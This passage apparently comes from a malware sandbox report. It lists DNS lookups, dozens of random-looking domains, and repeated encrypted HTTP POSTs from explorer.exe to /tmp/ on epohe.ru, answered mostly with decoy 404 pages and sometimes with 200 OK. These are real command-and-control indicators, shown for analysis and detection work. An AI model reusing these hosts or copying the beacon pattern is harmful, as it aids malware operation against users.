Sep 2, 2024 08:21:12.775898933 CEST	1.1.1.1	192.168.2.6	0x264	No error (0)	free.cdn.hstgr.net		84.32.84.152	A (IP address)	IN (0x0001)	false
Sep 2, 2024 08:21:54.991416931 CEST	1.1.1.1	192.168.2.6	0xe7db	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

www.darkviolet-alpaca-923878.hostingersite.com

fwivmymbxwb.com

epohe.ru

bvrcwhkhepnussxw.com

bfuqgtbxdbrm.com

nysunlaoxsnx.net

mngbwwbxxtu.org

mtxcnwqijndc.com

lbbemhvyacupfj.com

pnkjbaopqllltj.com

xabepmucutwrclm.org

ciagjuvshwyap.com

dlseqphhdlmhj.com

oydqaptimmqlwlr.com

ubqxonkbwrw.org

llwvqfhgyhhpg.com

yinxmrewdxvvup.com

iyfnrlbdswaun.org

glhjgpfospwhdw.net

gcybmsqpemm.net

ltleqvppjdrlod.com

atmipbdihgavjw.net

lefbfksalyjs.com

wiitjtnnnvend.net

rkfklwpuiufh.org

xqysrgfmfacgd.com

bjsidbjqhyjuh.net

rbkqrcgmoxbnb.com

ytcopihlywgad.org

ylpbksvjwmy.net

lumgcfdgtsy.org

nlfvvperahgbd.net

91.202.233.158

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49716	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:37.086312056 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fwivmymbxwb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: epohe.ru
Sep 2, 2024 08:20:37.086338043 CEST	214	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 28 b5 98 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA .[k,vuc(f]b{lD17$ce2w>g SW)3QVvOboDCKOM'-x)l?0UH
Sep 2, 2024 08:20:38.264113903 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49717	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:38.282176971 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bvrcwhkhepnussxw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: epohe.ru
Sep 2, 2024 08:20:38.282198906 CEST	318	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 5c 52 c9 9e Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu\R_mkI[?ZT.o-t 4_wJQB;=T;gF?[YJF@bGJ!D3UzpOQ~CcOv
Sep 2, 2024 08:20:39.421020985 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49718	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:39.432214975 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bfuqgtbxdbrm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: epohe.ru
Sep 2, 2024 08:20:39.432240963 CEST	362	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 34 0a a5 bb Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu4OVr\|#L3 kR<m~-*//yDO{v@.4dR%mrFk?Q@.lDPK;o"<U2
Sep 2, 2024 08:20:40.546471119 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49719	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:40.556700945 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nysunlaoxsnx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 221 Host: epohe.ru
Sep 2, 2024 08:20:40.556734085 CEST	221	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 25 0f f9 ab Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu%RAmHE4geIg=r4T;_%C XV]Y]`7-HqRFKJWj=8\|d
Sep 2, 2024 08:20:41.704777956 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49720	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:41.713304996 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mngbwwbxxtu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: epohe.ru
Sep 2, 2024 08:20:41.713325024 CEST	117	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 29 49 a6 8a Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu)IuCBw RJseZHq
Sep 2, 2024 08:20:42.945909023 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49722	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:42.955528021 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mtxcnwqijndc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: epohe.ru
Sep 2, 2024 08:20:42.955600977 CEST	140	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 4c 31 fb ac Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuL1Qgk$>,?>OMPzdD1@xN~
Sep 2, 2024 08:20:44.470120907 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:44 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49723	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:44.478555918 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lbbemhvyacupfj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: epohe.ru
Sep 2, 2024 08:20:44.478583097 CEST	160	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 34 05 b5 ec Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu4@zbHtRL=,byGHILtqxYE
Sep 2, 2024 08:20:46.136173010 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49724	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:46.143955946 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pnkjbaopqllltj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: epohe.ru
Sep 2, 2024 08:20:46.143980026 CEST	247	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 6f 5d e3 af Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuo]{1@d`N\Kem4szL)JBM(% VgfwcN&vld2T\|\k"zBLM@Z; Wp
Sep 2, 2024 08:20:49.003756046 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:48 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49725	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:49.012497902 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xabepmucutwrclm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: epohe.ru
Sep 2, 2024 08:20:49.012527943 CEST	224	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 20 1f d6 f3 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu XAsvq"Lo_^2\b/NpWK@ds8xgx2F?tI%9W~:c~`iul
Sep 2, 2024 08:20:50.181823015 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:49 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49726	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:50.189841986 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ciagjuvshwyap.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: epohe.ru
Sep 2, 2024 08:20:50.189861059 CEST	363	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 48 18 de 8f Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuH/hkBy4aU#/32\AYi9D$aJ_\|%&gU;H m&Zx!*O2@59Gb&csLW
Sep 2, 2024 08:20:51.829910994 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49727	2.185.214.11	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:20:51.837527990 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dlseqphhdlmhj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 161 Host: epohe.ru
Sep 2, 2024 08:20:51.837546110 CEST	161	OUT	Data Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 56 08 ae ff Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuVZd`laP`8KK.hz#7FOCA_fcPS!
Sep 2, 2024 08:20:53.004174948 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 06:20:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
